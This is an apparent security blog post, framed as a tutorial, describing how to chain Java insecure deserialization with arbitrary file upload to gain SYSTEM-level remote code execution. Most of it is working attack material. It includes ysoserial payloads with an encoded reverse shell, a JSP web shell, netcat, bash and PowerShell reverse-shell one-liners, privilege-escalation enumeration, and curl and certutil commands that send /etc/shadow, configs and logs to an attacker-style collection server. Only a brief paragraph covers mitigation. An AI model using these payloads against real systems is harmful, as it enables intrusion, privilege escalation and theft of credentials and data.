The Perfect Storm: Chaining Insecure Deserialization with Arbitrary File Upload for SYSTEM Shell

Listen to this Post

Featured Image

Introduction:

In the complex landscape of web application security, vulnerabilities rarely exist in isolation. The true danger emerges when attackers chain multiple, seemingly lower-severity flaws to create a devastating attack path. This article deconstructs a critical P2 finding where an attacker combined Insecure Deserialization and Arbitrary File Upload to achieve unauthenticated Remote Code Execution (RCE) and full SYSTEM-level compromise on a Java-based service.

Learning Objectives:

  • Understand the mechanics of Java object deserialization attacks and how to exploit them.
  • Learn how to weaponize an arbitrary file upload vulnerability beyond simple defacement.
  • Master the commands and techniques to detect, exploit, and mitigate this potent vulnerability chain.

You Should Know:

1. Identifying Java Deserialization Endpoints

The first step is locating endpoints that accept serialized Java objects. These often have distinctive characteristics in HTTP requests.

 Example HTTP Request with Serialized Data (Often Base64 Encoded)
POST /api/v1/process HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-java-serialized-object

rO0ABXQAVklF... (abbreviated Base64 serialized object data)

Step-by-step guide: Intercept application traffic using a proxy like Burp Suite. Look for POST requests containing lengthy, base64-like strings in the body or in specific cookies (e.g., JSESSIONID). The Content-Type headers might also be a clue, but often they are misconfigured. Tools like `ysoserial` can then generate payloads to test these endpoints.

2. Crafting the Deserialization Payload with ysoserial

Once a vulnerable endpoint is found, you use a tool like `ysoserial` to generate a malicious serialized object that executes OS commands.

 Generating a payload that runs a calc.exe (Proof-of-Concept)
java -jar ysoserial.jar CommonsCollections4 'calc.exe' > payload.ser

For a reverse shell, command must be encoded appropriately
java -jar ysoserial.jar CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84MCAwPiYx}|{base64,-d}|{bash,-i}' > shell.ser

Step-by-step guide: Ysoserial uses “gadget chains” (e.g., CommonsCollections4) from libraries within the target application. You must identify the correct chain for the target’s classpath. The output is a binary file (payload.ser) which you then base64-encode and submit in the vulnerable HTTP parameter.

3. Weaponizing Arbitrary File Upload

An arbitrary file upload flaw allows the attacker to place a malicious JSP web shell on the server, but they need to know the upload path. The deserialization payload can be used to reveal this.

 Linux command to find web root directories, injected via deserialization
find / -name ".jsp" -type f 2>/dev/null | head -n 5

Windows command alternative
dir /s C:\.jsp | findstr /i "webapps wwwroot"

Step-by-step guide: Exploit the deserialization vulnerability to execute a system command that discovers the absolute path where uploaded files are stored. This turns the file upload from a blind vulnerability into a known location for deploying a web shell.

4. Deploying a Web Shell via Upload

With the upload path known, use the file upload functionality to deploy a JSP web shell.

 Example JSP Web Shell (cmd.jsp)
<%@ page import="java.util.,java.io."%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>

Step-by-step guide: This code is saved as a `.jsp` file and uploaded through the vulnerable functionality. Once uploaded, you can access it at `http://vulnerable-app.com/uploads/cmd.jsp?cmd=whoami` to execute commands directly.

5. Establishing a Reverse Shell

A simple web shell is limited. Use it to execute a more powerful reverse shell payload for interactive access.

 Using the web shell to fetch and execute a netcat reverse shell
cmd=/usr/bin/nc -e /bin/bash 192.168.1.2 4444

 For a more robust Linux reverse shell
cmd=bash -c 'bash -i >& /dev/tcp/192.168.1.2/4444 0>&1'

 Windows reverse shell using PowerShell
cmd=powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Step-by-step guide: Before executing these commands, start a netcat listener on your attack machine: `nc -nlvp 4444`. Then, trigger the reverse shell by passing the appropriate command to your deployed web shell via the `cmd` parameter.

6. Privilege Escalation to SYSTEM/NT AUTHORITY

The initial shell often runs under a limited service account. The final step is escalating privileges to gain full control over the host.

 On Windows, check for common privilege escalation vectors
whoami /priv
systeminfo
accesschk.exe /accepteula -u -s

On Linux, check sudo permissions and SUID binaries
sudo -l
find / -perm -4000 -type f 2>/dev/null

Step-by-step guide: These commands help identify misconfigurations. For example, a service running as SYSTEM might have weak folder permissions, allowing you to replace its DLLs. Or a `sudo` rule might allow the service account to run a specific command as root without a password.

7. Exfiltration and Debug Log Harvesting

With SYSTEM-level access, you can now exfiltrate sensitive data, including application debug logs that may contain secrets for other systems.

 On Windows, using built-in certutil to exfiltrate a file
certutil -encode loot.zip encoded.txt & findstr /V "CERTIFICATE" encoded.txt > stager.txt & powershell Invoke-WebRequest -Uri http://exfil-server.com/collect -Method Post -InFile stager.txt

On Linux, using curl to exfiltrate data
curl -X POST --data-binary @/var/app/logs/debug.log http://exfil-server.com/collect
tar -czf loot.tar.gz /etc/passwd /etc/shadow /app/config && curl -X POST --data-binary @loot.tar.gz http://exfil-server.com

Step-by-step guide: These commands package and exfiltrate data to a server controlled by the attacker. The Windows example uses `certutil` to base64 encode a file before sending it to avoid binary data corruption in a POST request.

What Undercode Say:

  • The Sum is Greater Than The Parts: Alone, a blind file upload or a deserialization bug might be rated lower. Chained together, they form a critical, system-compromising threat. Penetration tests must actively search for these chains.
  • Context is King for Payloads: The success of `ysoserial` is entirely dependent on the libraries (gadget chains) present on the target server. Reconnaissance and careful testing are required; a payload that works on one endpoint may not work on another.

This vulnerability chain is a classic example of a “deathstar” attack path. The mitigation is twofold: first, implement robust input validation that rejects any serialized objects from untrusted sources; use safe serialization formats like JSON instead. Second, enforce strict controls on file uploads, including validating file type by content (not just extension), storing them outside the web root, or serving them via a separate domain with no script execution privileges.

Prediction:

The sophistication of vulnerability chaining will only increase with the adoption of AI-powered penetration testing tools. These systems will be able to automatically map application attack surfaces, identify discrete vulnerabilities, and proactively chain them together to demonstrate real-world impact with minimal human intervention. This will force a shift in bug bounty programs and risk assessments from scoring individual CVEs to rating the overall attack resilience of an application’s architecture, making defense-in-depth not just a best practice but an absolute necessity.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Hs Ninja – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky